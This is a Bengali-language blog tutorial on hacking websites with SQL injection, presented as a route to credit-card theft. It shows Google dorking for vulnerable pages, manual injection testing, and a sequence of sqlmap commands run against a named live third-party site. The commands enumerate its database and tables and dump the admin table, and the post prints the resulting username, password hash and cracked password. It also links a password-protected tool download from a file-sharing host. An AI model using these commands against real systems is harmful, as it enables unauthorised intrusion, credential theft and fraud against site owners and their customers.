উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

0
471

আসসালামু আলাইকুম ওয়া রহমাতুল্লাহি ওয়া বারাকাতুহু

 আমি আপনাদের মাজে হাজির হয়ে গেলাম আমার লিখা আরেকটি হ্যাকিং টিউটোরিয়াল নিয়ে আশা করি সবার ভাল লাগবে আমি সহজে ও সুন্দর করে বুজাতে চেষ্টা করব।যদি ভাল লাগে আর কিছু শিখতে পারেন তাহলে আমার কষ্ট স্বার্থক হবে। লেখাটি বড় দেখে ভয় পেয়েন না সহজ করে বুজাতে একটু বড় করেছি । 

 

আমাদের যা লাগবে :

১. SQLMap ডাউনলোড লিঙ্ক  https://www.mediafire.com/?c6g6owoo97bogs5   

পাসওয়ার্ডঃ faruk 

SQLMap ডাউনলোড দিয়ে ফাইলটি  winrar দিয়ে ফাইলটি রাইট ক্লিক করে Extrac Here ক্লিক করে ডেস্কটপে  রাখুন ।

২. Python 2.7 (Recomended) গুগল থেকে ডাউনলোড দিন তার পর ইন্সটল দিন 

৩. Computer / Laptop 

  প্রথম এ একটা dork  নিয়ে আমরা www.google.com  এ SEARCH  দিব !

অনেকের প্রশ্ন করতে পারে dork কি ? খায় না মাথায় দেয় এটা নিয়ে আলোচনা না করে সময় বারাব না আপনে গুগলে সার্চ দিলে অনেক পেয়ে যাবেন।না হয় গ্রুপে দেখুন দেওয়া আছে। 

আমি এটা দিয়ে গুগলে সার্চ দিলাম  news_view.php?id= 

ছবিঃ  উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

 

এখন আমরা দেখবো সাইট টি injectable কিনা ।এর জন্য আমাদের url এর শেষে একটি ‘ বসাতে হবে ।www.brntec.com/news_view.php?id=50‘ 

যদি ডাটাবেজের কিছু মিসিং আসে বা পেজের কিছু ইরর আসে তাহলে বুঝবেন সাইট টি injectable ।

যেমন : “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1″

অথবাঃFatal error: Call to a member function RecordCount() on a non-object in D:\wwwroot\brntec\news_view.php on line 63

 

আমাদের লাইভ টার্গেট সাইট http://www.brntec.com/news_view.php?id=50 

এবার কাজ শুরু করি >>>>

প্রথমে স্টার মেনু যান run লিখে এন্টার দিন । cmd লিখে এন্টার দিন ।

ছবিঃ

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

এখন SqlMap ওপেন করি লিখুনঃ 

cd desktop/sqmapl

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

এবার sqlmap.py -u টার্গেট সাইট –dbs কমান্ড দিব ।

যেমনঃ প্রথম কমান্ড :sqlmap.py -u http://www.brntec.com/news_view.php?id=50 –dbs

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

আমি সাইটের ডাটাবেজ পেলাম

available databases [2]:

[*] brntec 

[*] information_schema 

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

এখন আমাদের কাজ হচ্ছে brntec ডাটাবেজ নিয়ে । information_schema ডাটাবেজে আমাদের কোন কাজ নেই ।

এবার আমি সাইটের টেবিল বার করার জন্য কমান্ড দিবো

।sqlmap.py -u ভার্নাবল টার্গেট সাইট -D ডাটাবেজ –tables

তাহলে কমান্ড দাড়ায় 

দ্বিতীয় কমান্ড : sqlmap.py -u http://www.brntec.com/news_view.php?id=50 -D brntec –tables

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

আমি সাইটের টেবিল পেলাম

 Database: brntec

[30 tables]

 

+—————–+
| df_ad |
| df_gb |
| df_link |
| df_member |
| df_orders |
| df_page |
| df_set |
| df_tj |
| df_zp |
| df_zy |
| en_admin |
| en_case |
| en_message |
| en_news |
| en_news_type |
| en_page |
| en_page1 |
| en_page_type |
| en_product |
| en_product1 |
| en_product_type |
| zm_admin |
| zm_case |
| zm_message |
| zm_news |
| zm_news_type |
| zm_page |
| zm_page_type |
| zm_product |
| zm_product_type |
+—————–+

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

এখন আমাদের কাজ হচ্ছে en_admin  টেবিল নিয়ে ।এখানে আপনে ধারনা করে নিবেন কোনটা এডমিন টেবিল হতে পারে।

en_admin  টেবিলের কলাম বার করার জন্য এখন আমরা কমান্ড দিবো ।

sqlmap.py -u ভার্নাবল সাইট -D brntec -T en_admin  –columns

তাহলে কমান্ড দাড়ায় :

 তৃতীয় কমান্ড :  sqlmap.py -u http://www.brntec.com/news_view.php?id=50 -D brntec -T  en_admin –columns

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

আমরা সাইটের কলাম গুলা পাইলাম

Database: brntec
Table: en_admin
+——–+———————–+
| Column | Type |
+——–+———————–+
| flag | varchar(100) |
| id | mediumint(8) unsigned |
| name | varchar(20) |
| pass | varchar(32) |
+——–+———————–+

ছবিঃ

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

এখন আমাদের কাজ হচ্ছে name,pass কলাম নিয়ে।এখন আমরা শেষ পর্যায়ে । এখন আমরা username & password বের করার জন্য কমান্ড দিব।

sqlmap -u ভার্নাবল সাইট  -D brntec -T users -C name,pass –dump

তাহলে কমান্ড দাড়ায় :

চতুর্থ কমান্ড :

sqlmap.py -u http://www.brntec.com/news_view.php?id=50 -D brntec -T  en_admin -C name,pass –dump 

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

এই কমান্ডের ফলে আমরা সাইটের username & password পেয়ে গেলাম ।

 

Database: brntec
Table: en_admin
[1 entry]
+——-+——————————————+
| name | pass |
+——-+——————————————+
| admin | 827ccb0eea8a706c4c34a16891f84e7b (12345) |
+——-+——————————————+

ছবিঃ 

উইন্ডোজে SqlMap ইন্সটল ক্রেডিট কার্ড ও ওয়েবসাইট হ্যাকিং(বাংলা টিউটোরিয়াল )

আপনে ভাবছেন এখানে ক্রেডিট কার্ড হ্যাকিং কই :o একটু মাথা খাটালেই পেয়ে যাবেন ।এটা ভাল করে শিখুন দেখবেন সব কিলিয়ার হয়ে গেছে =Dআমি আর ওটা নিয়ে বিস্তারিত ব্ললাম না।তাও যদি না বুজতে পারেন পরে আমি আছি না। আমার কাজ শেষ সবাই ভাল থাকবেন আর ভাল লাগলে কমেন্ট করবেন সমস্যা হলে ও জানাবেন ।               

 >সমাপ্ত > 

Facebook Me Faruk Ahmed

Facebook Group Hacking Jagot

একটি উত্তর ত্যাগ